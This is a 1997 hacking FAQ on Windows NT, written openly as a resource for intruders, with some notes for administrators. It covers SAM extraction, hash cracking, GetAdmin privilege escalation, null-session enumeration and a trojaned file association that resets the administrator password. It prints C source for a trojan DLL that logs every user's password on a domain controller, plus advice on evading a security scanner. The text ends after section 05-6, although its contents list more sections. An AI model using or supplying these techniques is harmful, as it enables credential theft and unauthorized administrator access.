--------------------------------------------------------------------------- From the Nomad Mobile Research Centre: Frequently Asked Questions About Hacking Windows NT "The Unofficial NT Hack FAQ" October 25, 1997 Beta Version 2 Compiled by Simple Nomad Notes about this release - I've added a Registry section, and as I "go to press" so to speak, NT 5.0 looms on the horizon. I have not included anything really web related, you can expect that in a future updated Web Hack FAQ. If you are reading this and it is 1998, my guess is that it is horribly out of date ;-) as things are really starting to happen with NT and security at a fast pace. As always, your comments and additions are welcome. U means Updated, N means New --------------------------------------------------------------------------- --------------------------------------------------------------------------- Contents --------------------------------------------------------------------------- Section 00 General Info 00-1. What is this "FAQ" for? 00-2. What is the origin of this FAQ and how do I add to it? 00-3. Is this FAQ available by anonymous FTP or WWW? U 00-4. How was this FAQ prepared? --------------------------------------------------------------------------- Section 01 Domains and Basic Security 01-1. What are the components of NT security? 01-2. How does the authentication of a user actually work? 01-3. What is "standalone" vs. "workgroup" vs. "domain"? U 01-4. What is a Service Pack? N 01-5. What is a Hot Fix? 01-6. What's with "C2 certification"? 01-7. Are there are interesting default groups to be aware of? 01-8. What are the default directory permissions? 01-9. Are there any special restrictions surrounding the Administrative Tools group in Presentation Manager? --------------------------------------------------------------------------- Section 02 Access to Accounts 02-1. What are common accounts and passwords in NT? 02-2. What if the Sys Admin has "renamed" the administrator account? N 02-3. I lost the Administrator password. What do I do? --------------------------------------------------------------------------- Section 03 Passwords 03-1. How do I access the password file in NT? 03-2. How do I crack NT passwords? 03-3. What is a "brute force" password cracker? 03-4. What is a "dictionary" password cracker? 03-5. Which method is best for cracking? 03-6. How does a Sys Admin enforce better passwords? U 03-7. Can an Sys Admin prevent/stop SAM extraction? N 03-8. How is password changing related to "last login time"? --------------------------------------------------------------------------- Section 04 From The Console 04-1. What does console access get me? U 04-2. What about the file system? 04-3. What is NetMon and why do I care? 04-4. What can I do to get info from other computers from the console? N 04-5. What is GetAdmin.exe? --------------------------------------------------------------------------- Section 05 From the Network 05-1. Should I even try for local administrator access? U 05-2. I have guest remote access. How can I get administrator access? U 05-3. What about %systemroot%\system32 being writeable? 05-4. What if the permissions are restricted on the server? 05-5. What exactly does the NetBios Auditing Tool do? U 05-6. What is the "Red Button" bug? u 05-7. What about forging DNS packets for subversive purposes? 05-8. What about shares? N 05-9. How do I get around a packet filter-based firewall? --------------------------------------------------------------------------- Section 06 File and Directory Access 06-1. How is file and directory security enforced? 06-2. What is NTFS? 06-3. Are there are vulnerabilities to NTFS and access controls? 06-4. What is Samba and why is it important? 06-5. I hack remotely. Once in, how can I do all that GUI stuff? --------------------------------------------------------------------------- Section 07 Miscellaneous Info on NT 07-1. How do I bypass the screen saver? 07-2. What can sniffing get me? U 07-3. How can I detect that a machine is in fact NT on the network? 07-4. Can I do on-the-fly disk encryption on NT? 07-5. Does the FTP service allow passive connections? N 07-6. What is this "port scanning" you are talking about? N 07-7. Does NT have bugs like Unix' sendmail? --------------------------------------------------------------------------- Section 08 Denial of Service 08-1. What is "Denial of Service"? 08-2. What is the Ping of Death? 08-3. What is a SYN Flood attack? 08-4. What can telnet give me in the way of denial of service? 08-5. What can I do with Samba? 08-6. How do I lock out others from files? 08-7. What's with ROLLBACK.EXE? N 08-8. What is an OOB attack? 08-9. Are there any other denial of service attacks? --------------------------------------------------------------------------- Section 09 The Registry N 09-1. What is the Registry? N 09-2. What are hives? N 09-3. Why is the Registry like this and why do I care? N 09-4. What do I do with a copy of SAM? --------------------------------------------------------------------------- Section 10 Resources U 10-1. What are some NT WWW locations? 10-2. What are some NT USENET groups? U 10-3. What are some NT mailing lists? 10-4. Where are some other NT FAQs? U 10-5. Where can I get the files mentioned in this FAQ? N 10-6. Where can I find Service Packs and Hot Fixes? --------------------------------------------------------------------------- Section 11 Mathematical/Theoretical 11-1. Can sessions be hijacked? U 11-2. Are "man in the middle" attacks possible? 11-3. What about TCP Sequence Number Prediction? --------------------------------------------------------------------------- Section 12 For Administrators Only 12-1. How do I secure my server? 12-2. I'm an idiot. Exactly how do hackers get in? --------------------------------------------------------------------------- Appendix Section N A-01. Source Code for an Audit Script N A-02. Perl Code for NETSCRIPT.PL N A-03. Source Code for NT LSA Exploit --------------------------------------------------------------------------- Section 00 General Info --------------------------------------------------------------------------- 00-1. What is this "FAQ" for? This FAQ serves two distinct purposes -- the first is to provide the NT hacker with a resource. The second purpose is a wake-up call to Sys Admins who are too lazy to install the latest Service Pack. This FAQ assumes basic knowledge of NT. If you do not know the basics, go buy a book or take one of those overpriced classes I get junk mail about. Do not send me email asking me questions that can be answered with basic knowledge -- I don't acknowledge them, I delete them. --------------------------------------------------------------------------- 00-2. What is the origin of this FAQ and how do I add to it? This FAQ started for two reasons. First, several people asked if I was going to do one. This seems reason enough, but the clincher was reading a partial quote from the NT Security FAQ, which stated in the Legaleeze section that the FAQ was not "a cookbook to be used by crackers to gain access to Windows NT systems." Well, that's hardly fun, now is it! (BTW the NT Security FAQ is still an excellent resource.) I've been collecting info and reading about NT, but once I got to load up NT in my lab things really got moving. To add info to this FAQ, simply send an email to faq@nmrc.org with "NT" in the subject. Please let me know what steps can duplicate an exploit, any patches or workarounds that might fix it, whether Microsoft knows or cares about it, and if you want to be credited in the FAQ. Anonymous submissions are okay. Encrypt them if you like, here's my PGP key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzEQrjMAAAEEANaIf2AiInhVwmrZEFZ5V2eyZfuJfjoI9unJwRhokwJ4TtVh ApEwjXVEbJBCPRKOHzibi5IEF2BirpzzlSy0Aj82yZk/iqYtJO60S0aycSPNPBl5 BmoLJaUjxakmnMMXOl3qdeWWtScpP7B4QTHyfsHRvQz0HSUPxh6RUqAiTzdxAAUR tCRTaW1wbGUgTm9tYWQgPHRoZWdub21lQGZhc3RsYW5lLm5ldD4= =v0Xj -----END PGP PUBLIC KEY BLOCK----- --------------------------------------------------------------------------- 00-3. Is this FAQ available by anonymous FTP or WWW? The FAQ is available as text or HTML from the following location: - http://www.nmrc.org/files/nt Entire FAQ online: - http://www.nmrc.org/faqs/nt --------------------------------------------------------------------------- 00-4. How was this FAQ prepared? After collecting information from a number of sources, I loaded NT Server 4.0 and performed a number of the techniques discussed in this FAQ. Most of the tests involved Samba. Tests were conducted at the NMRC labs, on a friend's network, and at a client's site (yes they gave me permission). The tests were not THAT scientific -- most involved duplicating the many bugs that people have reported and playing with the various NT hacking tools that are starting to appear. I've also tried to document some of the major components that make up NT, especially if they are related to security. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 01 Domains and Basic Security --------------------------------------------------------------------------- 01-1. What are the components of NT security? There are several different components. Each has a role within the overall NT security model. Because of the amount and complexity of components in the security model, not only should the individual components be explored, but how they work together should be explored. Local Security Authority (LSA) ------------------------------ This is also known as the Security Subsystem. It is the central component of NT security. It handles local security policy and user authentication. LSA also handles generating and logging audit messages. Security Account Manager (SAM) ------------------------------ SAM handles user and group accounts, and provides user authentication for LSA. Security Reference Monitor (SRM) -------------------------------- SRM enforces access validation and auditing for LSA. It checks user accounts as the user tries to access various files, directories, etc, and either allows or denies access. Auditing messages are generated as a result. The SRM contains a copy of the access validation code to ensure that resources are protected uniformly throughout the system, regardless of resource type. User Interface (UI) ------------------- An important part of the security model, the UI is mainly all that the end user sees, and is how most of the administration can be performed. --------------------------------------------------------------------------- 01-2. How does the authentication of a user actually work? First, a user logs on. When this happens, NT creates a token object that represents that user. Each process the user runs is associated with this token (or a copy of it). The token-process combination is refered to as a subject. As subjects access objects such as files and directories, NT checks the subject's token with the Access Control List (ACL) of the object and determines whether to allow the access or not. This may also generate an audit message. --------------------------------------------------------------------------- 01-3. What is "standalone" vs. "workgroup" vs. "domain"? Each NT workstation participates in either a workgroup or a domain. Most companies will have NT workstations participate in a domain for management of the resource by the administrator. A domain is one or more servers running NT server with all of the servers functioning as a single system. The domain not only contains servers, but NT workstations, Windows for Workgroups machines, and even LAN Manager 2.x machines. The user and group database covers ALL of the resources of a domain. Domains can be linked together via trusted domains. The advantage of trusted domains is that a user only needs one user account and password to get to resources across multiple domains, and administrators can centrally manage the resources. A workgroup is simply a grouping of workstations that do not belong to a domain. A standalone NT workstation is a special case workgroup. User and group accounts are handled differently between domain and workgroup situations. User accounts can be defined on a local or domain level. A local user account can only logon to that local computer, while a domain account can logon from any workstation in the domain. Global group accounts are defined at a domain level. A global group account is an easy way to grant access to a subset of users in a domain to, say, a single directory or file located on a particular server within the domain. Local group accounts are defined on each computer. A local group account can have global group accounts and user accounts as members. In a domain, the user and group database is "shared" by the servers. NT workstations in the domain DO NOT have a copy of the user and group database, but can access the database. In a workgroup, each computer in the workgroup has its own database, and does not share this information. --------------------------------------------------------------------------- 01-4. What is a Service Pack? Microsoft maintains a large online database of fixes for operating systems and applications. These fixes are refered to as Service Packs. NT has its share, and typically the latest Service Pack has the latest fixes, including security patches. Installing a Service Pack is NOT something to be taken lightly -- to turn on or off some features involves some Registry editing. Installation can in some circumstances disable or cause conflicts. Often after a new product has been loaded, even a Microsoft product, you must reinstall the Service Pack. For this reason, LAN administrators often neglect the timely installation of Service Packs. For the hacker, this is a decided advantage -- especially if the site has numerous NT servers and workstations in need of patching. One day maybe Microsoft will make Service Pack installation a little less painless, but until then you will find MANY locations will be either under-patched or not patched at all. Typically Service Packs are fairly well tested, although this is no guarantee everything is "fixed". Admins should not place 100% of their faith in them, but then hackers should not underestimate their value in closing holes. Service Pack locations are listed in Section 10-6. --------------------------------------------------------------------------- 01-5. What is a Hot Fix? A Hot Fix is what is released between Service Pack releases. A Hot Fix is generally released to address a specific problem or condition. Some Hot Fixes may have a prerequisite of a certain Service Pack, and are typically included in the next Service Pack. Once again, some of the Hot Fixes are downright dangerous to monkey around with, and many LAN folks will simply neglect installation especially at large NT shops. And once again this is good news for the hacker. Hot Fixes are not as well tested as the Service Packs are -- often they are released after headline-grabbing security flaws are announced, so they are often rushed to press. Hot Fix locations are listed in Section 10-6. --------------------------------------------------------------------------- 01-6. What's with "C2 certification"? I'm not going to get into a bunch of detail on this. There are far better places to go for the info, but I will state this -- running the c2config utility to "lock down" your system will not protect you if you want to run third party software, use the floppy drive, or connect to the network. It is simply a marketing tactic used by Microsoft. The C2 tested configuration had no network access and no floppy drive. Who wants to use that? I can see some value in running the c2config utility and "opening up" the system as needed to make it useable, but this is a lot of work and beyond the scope of what I'm discussing here. --------------------------------------------------------------------------- 01-7. Are there are interesting default groups to be aware of? There are a number of built-in local groups can do various functions, some which would be better off being left to the Administrator. Administrators can do everything, but the following groups' members can do a few extra items (I only verified this on 4.0): - Server Operators: do a shutdown, even remotely; reset the system time; perform backups and restores. - Backup Operators: do a shutdown; perform backups and restores. - Account Operators: do a shutdown. - Print Operators: do a shutdown. Also members of these groups can login at the console. As you explore this FAQ and possibly someone else's server, remember these permissions. Gaining a Server Operator account and placing a trojan that activates after a remote shutdown could get you Administrator. --------------------------------------------------------------------------- 01-8. What are the default directory permissions? Like 01-7, I only verified these on 4.0. And remember, Administrators are deities. Otherwise, if it isn't here, the group doesn't have access. \ (root), \SYSTEM32, \WIN32APP - Server Operators and Everyone can read and execute files, display permissions on files, and do some changing on file attributes. \SYSTEM32\CONFIG - Everyone can list filenames in this directory. \SYSTEM32\DRIVERS, \SYSTEM\REPL - Server Operators have full access, Everyone has read access. \SYSTEM32\SPOOL - Server Operators and Print Operator have full access, Everyone has read access. \SYSTEM32\REPL\EXPORT - Server Operators can read and execute files, display permissions on files, and do some changing on file attributes. Replicator has read access. \SYSTEM32\REPL\IMPORT - Server Operators and Replicator can read and execute files, display permissions on files, and do some changing on file attributes. Everyone has read access. \USERS - Account Operators can read, write, delete, and execute. Everyone can list filenames in this directory. \USERS\DEFAULT - Everyone has read, write, and execute. --------------------------------------------------------------------------- 01-9. Are there any special restrictions surrounding the Administrative Tools group in Presentation Manager? The following tools have the following default group restrictions in 4.0: Disk Administrator - Must be a member of the Administrators group. Event Log - Anyone can run Event Viewer, but only members of the Administrators group can clear logs or view the Security Log. Backup - Anyone can backup a file they have normal access to, but only the Administrators and Backup Operators can over override normal access. User Manager - Users and Power Users can create and manage local groups. User Manager for Domains - Users and Power Users can create and manage local groups if logged on at the server console, otherwise it is restricted to Administrators and Account Operators. Server Manager - Only Administrators, Domain Admins, and Server Operators can use this on domains they have an account on. Account Operators can only add new accounts to the domain. Some features in Server Manager can only be used by the Administrators and Domain Admins. --------------------------------------------------------------------------- Section 02 Access to Accounts --------------------------------------------------------------------------- 02-1. What are common accounts and passwords in NT? There are two accounts that come with NT out of the box -- administrator and guest. In a network environment, I have run into local administrator access unpassworded, since the Sys Admin thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to an NT box by using its local administrator account with no password. Guest is another common unpassworded account, although recent shipments of NT disable the account by default. While it is possible that some companies will delete the guest account, some applications require it. If Microsoft Internet Studio needs to access data on another system, it will use guest for that remote access. --------------------------------------------------------------------------- 02-2. What if the Sys Admin has "renamed" the administrator account? It is possible that a Sys Admin will create a new account, give that account the same access as an administrator, and then remove part of the access to the administrator account. The idea here is that if you don't know the administrator account name, you can't get in as an administrator. Typing "NBTSTAT -A ipaddress" will give you the new administrator account, assuming they are logged in. A bit of social engineering could get them to log in as well. nbtstat will also give you other useful information such as services running, the NT domain name, the nodename, and the ethernet hardware address. See also section 05-6 which discusses a bug that allows you to get the new administrator account name. --------------------------------------------------------------------------- 02-3. I lost the Administrator password. What do I do? Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need to download Petter's code to your Linux machine (you DO have one of those, don't you?) and compile it using a libDES and MD4 library. Now mount the NT drive read/write and follow the instructions in the readme. The instructions are pretty easy to follow, especially if you know enough to get to the point to use them ;-) Actually, to make things easier, Petter has built a bootdisk image that steps you through the entire thing. I'll be the first to admit that Petter's code is as dangerous as hell, but it does work and I had no problems. YMMV. Consider using GetAdmin.exe (section 04-5) and go from there if you are too paranoid or fearful of booting up Linux to get to an NT machine. --------------------------------------------------------------------------- Section 03 Passwords --------------------------------------------------------------------------- 03-1. How do I access the password file in NT? The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of the security database. This is usually world readable by default, but locked since it is in use by system compotents. It is possible that there are SAM.SAV files which could be readable. If so, these could be obtained for the purpose of getting password info. During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it was just installed, only the Administrator and Guest accounts will be there, but maybe Administrator is enough -- especially if the Administrator password is not changed after installation. If the Sys Admin updates their repair disks, or you get a hold of a copy of the repair disks, you can get password database. If you are insane, you can go poking around in the SAM secret keys. First, schedule service to logon as LocalSystem and allow it to interact with the desktop, and then schedule an interactive regedt32 session. The regedt32 session will be running as LocalSystem and you can play around in the secret keys. However, if you change some stuff this might be very bad. You have to be Administrator to do this, though, so for the hacker you need to walk up to the machine while the Administrator is logged in and distract them by telling them they're giving away Microsoft t-shirts in the lobby (this doesn't always work ;-). --------------------------------------------------------------------------- 03-2. How do I crack NT passwords? First off, it should be explained that the passwords are technically not located on the server, or in the password database. What IS located there is a one-way hash of the password. Let me explain... Two one-way hashes are stored on the server -- a Lan Manager password, and a Windows NT password. Lan Manager uses a 14 byte password. If the password is less than 14 bytes, it is concantenated with 0's. It is converted to upper case, and split into 7 byte halves. An 8 byte odd parity DES key is constructed from each 7 byte half. Each 8 byte DES key is encrypted with a "magic number" (0x4B47532140232425 encrypted with a key of all 1's). The results of the magic number encryption are concantenated into a 16 byte one way hash value. This value is the Lan Manager "password". A regular Windows NT password is derived by converting the user's password to Unicode, and using MD4 to get a 16 byte value. This hash value is the NT "password". So to crack NT passwords, the username and the corresponding one way hashes (Lan Man and NT) need to be extracted from the password database. Instead of going out and writing some code to do this, simply get a copy of Jeremy Allison's PWDUMP, which goes through SAM and gets the information for you. PWDUMP does require that you are an Administrator to get stuff out of the registry, but if you can get ahold of copies of the security database from another location (see Section 03-1) you can use those. Obviously from this point you can use one of several cracking utilities to perform either a brute force or dictionary attack on either the Lan Man or NT password. Several freeware products are available on the Internet. They include: Cracker Author(s) Compiles on... Notes ---------------- ------------------- --------------- ---------------------- c50a-nt-0.20.tgz Bob Tinsley Unix Dictionary cracker, a port of Alec Muffett's Crack 5.0 for Unix. lc15exe.tgz Mudge and Weld Pond Unix, includes Best of the bunch, can from the L0pht GUI NT version do brute force very and DOS version quickly, also can use a dictionary. NTCrack.tar.gz Jonathan Wilkins Unix, includes Dictionary cracker, on NT version it's second revision. --------------------------------------------------------------------------- 03-3. What is a "brute force" password cracker? A brute force cracker simply tries all possible passwords from legal characters until it gets the password. From a cracker perspective, this is usually very time consuming. L0phtcrack 1.5, a brute force cracker, makes certain assumptions and reduces this time down considerably. As pointed out in section 03-2, the Lan Manager password concantenated to 14 bytes, and split in half. The halves can be worked on individually. If the password was originally only 7 characters or less, that second half is always 0xAAD3B435B51404EE. To further ease brute force cracking, since a substantial reduction in bits occurs during the deriving of the 8 byte DES key from the 7 byte key, less keys have to be tried. Also since the password is converted to upper case before one way encrypting it, Lan Manager password cracking does not have to take into consideration the possibility of lower case letters. L0phtcrack incorporates techniques to exploit all of these possibilities. By cracking the Lan Manager password first, the NT password can be brute forced to determine the proper case of each alpha character. Initital tests of L0phtcrack show its brute force capability to be quite admirable. A brute force of Administrator on the NMRC dedicated cracking machine took 7 days (some Unix passwords have be worked on for 3 weeks before being cracked). The NMRC dedicated cracking machine is running Slackware on a 486 DX50, so this is quite quite fast by NMRC standards. The latest version, L0phtCrack 1.5, is even faster. --------------------------------------------------------------------------- 03-4. What is a "dictionary" password cracker? All three of the password crackers listed in section 03-2 can do dictionary attacks. A dictionary attack is simply takes a list of dictionary words, and one at a time encrypts them using the same encryption algorithm NT uses to check and see if they encrypt to the same one way hash. If the hashes are equal, the password is considered cracked. The best of these dictionary crackers is the Crack 5.0 NT port, namely because of the strength of the mutation filters. These filters allow you to change "idiot" to "1d10t" and other advanced variations to get the most from a word list. Although L0phtcrack doesn't do the permutations like Crack, there are several ways you can "pre-treat" a word list, in particular you can use the DOS-based TPU. This utility does a number of filter operations, so with the right amount of creativity you can create a pretty substantial list. --------------------------------------------------------------------------- 03-5. Which method is best for cracking? Actually it depends on your resources and your needs. If you simply need to crack a password and there is no real time limit (just raw CPU to waste) then brute force is the way to go. If you need a password quickly, using a wordlist might shorten your time. In general, a swipe with a couple of decent word lists will get some, permutations can get a few more, and the rest can be simply brute forced. Watch what the cracked passwords are. If you can spot a pattern, such as all lower case with 2 numbers at least six characters long, this may give you some clues for what to feed your brute forcer. --------------------------------------------------------------------------- 03-6. How does a Sys Admin enforce better passwords? There are several freeware utilities that allow for password changing with rules enforced. These range from the simple passwd utility by Alex Frink to Microsoft's own utilities. The NT Server 4.0 Resource Kit has a utility called Passprop that enforces random passwords. Also on Service Pack 2 is a DLL called PASSFILT that will does basically the same thing. --------------------------------------------------------------------------- 03-7. Can an Sys Admin prevent/stop SAM extraction? As long as you can get in as Administrator, you are basically vulnerable. Microsoft has gradually increased its security for the SAM files and the hashes, but as things like L0phtCrack are quickly improved and Microsoft insists on backward compatibility with LAN Manager-style logins, things will be vulnerable. In fact, the latest L0phtCrack can take input from stored sniffer traces to use as the source for its password cracking. So for you sys admins out there, keep absolutely current of Service Packs and Hot Fixes. For you hackers out there, well, it's a big bright world ;-) --------------------------------------------------------------------------- 03-8. How is password changing related to "last login time"? Let's say an admin is checking the last time certain users have logged in by doing a NET USER /DOMAIN. Is the info accurate? Most of the time it will NOT be. Most users do not login directly to the Primary Domain Controller (PDC), they login to a Backup Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-write versions. To keep the already ungodly amount of network traffic down, BDCs do not tell the PDC that they have an update of the last login time until a password change has been done. And the NET USER /DOMAIN command checks the PDC, so last login time returned from this command could be wildly off (it could even show NEVER). As a hacker, if you happen to know that password aging is not enforced, then you can bet that last login times will probably not be very accurate. --------------------------------------------------------------------------- Section 04 From The Console --------------------------------------------------------------------------- 04-1. What does console access get me? There are a few advantages to having direct console access. First off, try the hacks listed in sections 05-1, 05-2, and 05-3. 05-3 especially may not work across a network if the administrator is not allowed to login except at the console. And a brute force attack from the console will run a lot quicker than across the network anyway. --------------------------------------------------------------------------- 04-2. What about the file system? Obviously gaining access to the file system from the console is much easier than across a network, especially if the Sys Admin is trying to keep you out. Try booting up the system from an MS-DOS diskette, and running NTFSDOS.EXE to access the NTFS file system. Currently this software is read only, so it is only good for getting copies of existing data. Linux is another OS that will read NTFS file system, but "simply loading Linux" on a "spare partition" is usually impractical, and hardly simple if you are not familiar with it. See section 02-3 for an easier Linux method. --------------------------------------------------------------------------- 04-3. What is NetMon and why do I care? NetMon is Microsoft's Network Monitor. It is a sniffer that runs under NT, and being a sniffer if you have to ask why you care, well, never mind ;-) NetMon is protected by a password scheme on version 3.51 that has nothing to do with regular NT security. In Phrack 48 file 15, AON and daemon9 have not only cracked the encryption scheme, they have written exploits for it as well. Check Section 10-6 for the location of the exploit code (it includes full source including a Unix version in case you do not have an NT compiler). By the way, compared to other commercial sniffers, NetMon sucks. --------------------------------------------------------------------------- 04-4. What can I do to get info from other computers from the console? If the console you have stumbled on is a domain controller (or you have simply hooked one up), try these steps to get a list of accounts on the target machine: 1. From the USER MANAGER, create a trusting relashionship with the target. 2. Enter whatever when asked for a password. Don't fret when it doesn't work. The target is now on your trusting list. 3. Launch NT Explorer and right click on any folder. 4. Select SHARING. 5. From the SHARED window, select ADD. 6. From the ADD menu, select your target NT server. 7. You will now see the entire group listing of the target. 8. Select SHOW USERS and you will see the entire user listing, including full names and descriptions. This gives you a list of user accounts to target for individual attack. By studying the group memberships, you can even make decisions about who will have more privileges than others. --------------------------------------------------------------------------- 04-5. What is GetAdmin.exe? GetAdmin.exe is a program written by Konstantin Sobolev. It exploits a subfunction in NtAddAtom that does not check the address of the output. By altering where the output can be written to, GetAdmin adds a user to the Administrators group. It works on NT 4.0. The easiest way to use it is to simply copy it to \TEMP (along with its DLL, GASYS.DLL) and run it like so: GETADMIN GUEST (or whatever account you wish to add). This will add Guest to the Administrators group. GetAdmin will add domain accounts on a primary domain controller and even other domain accounts. Since it is a command line tool, it will work across a telnet session. There is a post SP3 Hot Fix available from Microsoft that defeats this if loaded. It is possible that some type of filtering might be in place to prevent uploading or downloading of files. To circumvent this, try renaming the executable with some other extension. For example START GETADMIN.XXX GUEST will work fine if EXEs are a problem. --------------------------------------------------------------------------- Section 05 From the Network --------------------------------------------------------------------------- 05-1. Should I even try for local administrator access? Oh yes. A lot of NT administrators do not understand that when an NT box joins a domain, if they left that administrator password blank, it doesn't get "filled in" or "overwritten". Belonging to a domain does NOT turn off local users. If you get local administrator, check out the exploit code in section 05-3 to get more access elsewhere. If you gain local administrator, try some of these tricks (these will work with the default settings after installation on the target): - NBTSTAT -A x.x.x.x (plug in the IP address of the box you're after) - Add the machine name this returns to your LMHOSTS file. - If you are not on an NT 4.x machine, type NBTSTAT -R to refresh the NetBios names. - Try NET VIEW \\machinename to see the shares - Try DIR \\machinename\share to list shares if open - Try NET VIEW \\ipaddress or NET VIEW \\fully.qualified.name.com, which should get you the user names under NT 4.0. --------------------------------------------------------------------------- 05-2. I have guest remote access. How can I get administrator access? Basic NT 3.51 has some stuff read/writeable by default. You could edit the association between an application and the data file extension using regedt32. First off, you should write a Win32 app that does nothing but the following - net user administrator biteme /y notepad %1 %2 %3 %4 %5 In a share you have read/write access to, upload it. Now change the association between .txt files and notepad to point to the location of the uploaded file, like \\ThisWorkstation\RWShare\badboy.exe. Now wait for the administrator to launch a text file by double clicking on it, and the password becomes "biteme". Of course, if the Sys Admin is smart they will have removed write permission from Everyone for HKEY_CLASSES_ROOT, only giving out full access to creator\owner. If the system is 4.0, see section 04-5 regarding the use of GetAdmin.exe. --------------------------------------------------------------------------- 05-3. What about %systemroot%\system32 being writeable? Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp. ------------- cut -------------- #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x\n", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } ------------- cut -------------- If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systenroot%\system32. ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan. It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else. --------------------------------------------------------------------------- 05-4. What if the permissions are restricted on the server? By default the NT administrator account does not have a lockout feature like normal users accounts, to prevent a denial-of-service attack on the administrator account. Since failed logins are not logged by default, you could possibly gain administrator access by sheer brute force. If the Sys Admin runs passprop.exe they can turn on the lockout feature of Administrator. --------------------------------------------------------------------------- 05-5. What exactly does the NetBios Auditing Tool do? Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based systems. Here is a quote from Secure Networks Inc about the product - "The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system. It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client. The major steps are as follows: A UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name". This is needed to establish a session. The reply also can contain other information such as the workgroup and account names of the machine's users. This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different port. TCP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information. If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reachable. Provided a connection is established Netbios "protocol levels" are now negotiated across the new connection. This establishes various modes and capabilities the client and server can use with each other, such as password encryption and if the server uses user-level or share-level Security. The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than NT. If the server requires further session setup to establish credentials, various defaults are attempted. Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query. Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of it. Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers. Attempts are then made to connect to all listed file system shares and some potentially unlisted ones. If the server requires passwords for the shares, defaults are attempted as described above for session setup. Any successful connections are then explored for writeability and some well-known file-naming problems [the ".." class of bugs]. If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent. Information is collected under the appropriate vulnerability at most of these steps, since any point along the way be blocked by the Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections without a valid username and/or password. A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly so. Printer and other "device" services offered by the server are currently ignored." If you need more info on NAT, try looking at this web location: http://www.secnet.com/ntinfo/ntaudit.html --------------------------------------------------------------------------- 05-6. What is the "Red Button" bug? MWC has released an exploit that allows the following to occur -- the registry of a remote machine can be accessed, a list of users AND of shares can be obtained, even if the intruder hasn't logged in. There is a built in user called "anonymous" that is usually used for communication between machines. This exploit takes advantage of the fact that anonymous is a member of the group Everyone. Because of this, the following can be done: - Any share that can be accessed by Everyone is vulnerable. - System and application logs can be read. - Any NT machine with NetBios bound to the network can have its registry read or written to if Everyone has that access. - Using Lan Manager calls can give a list of all users, the Administrator (if renamed), and a list of all shares. Using this access a trojan could be loaded, since often the group Everyone has access to application software (see scetions 05-2, and 05-3 for ideas here). It is possible that a Sys Admin could have unbound NetBios from the interface. This would disallow some access. Typically at a security aware site you would find the machines outside the firewall, like the Web server or FTP server configured this way (and all other access blocked by the firewall. However if you compromise the machine this could be a handy partial backdoor -- especially if you are using one machine as a "drop" during an attack. If all the users are moved from the Everyone group, you are also dead in the water. For you admins out there, ISS has released a tool to automate this process. And admins you should check and see what shares that Everyone can get to. The bug can manually be done -- no exploit code needed. Try this from a 4.00 workstation: net use \\targetserver\ipc$ "" /user:"" Now run User Manager, Event Viewer, Registry Editor, or simply use the net command to target the remote machine. The administrator account's SID always ends in -500 (Guest is -501) so find that and you have the administrator account, even if renamed. The built-in local groups (documented and undocumented) always have the same SID, so check out your own machine first and compare -- especially if some of these have been renamed. MWC's web site is http://www.ntsecurity.com, and the exploit code can be found there. ISS's tool can be found at ftp://ftp.iss.net/everyone2users.exe. --------------------------------------------------------------------------- 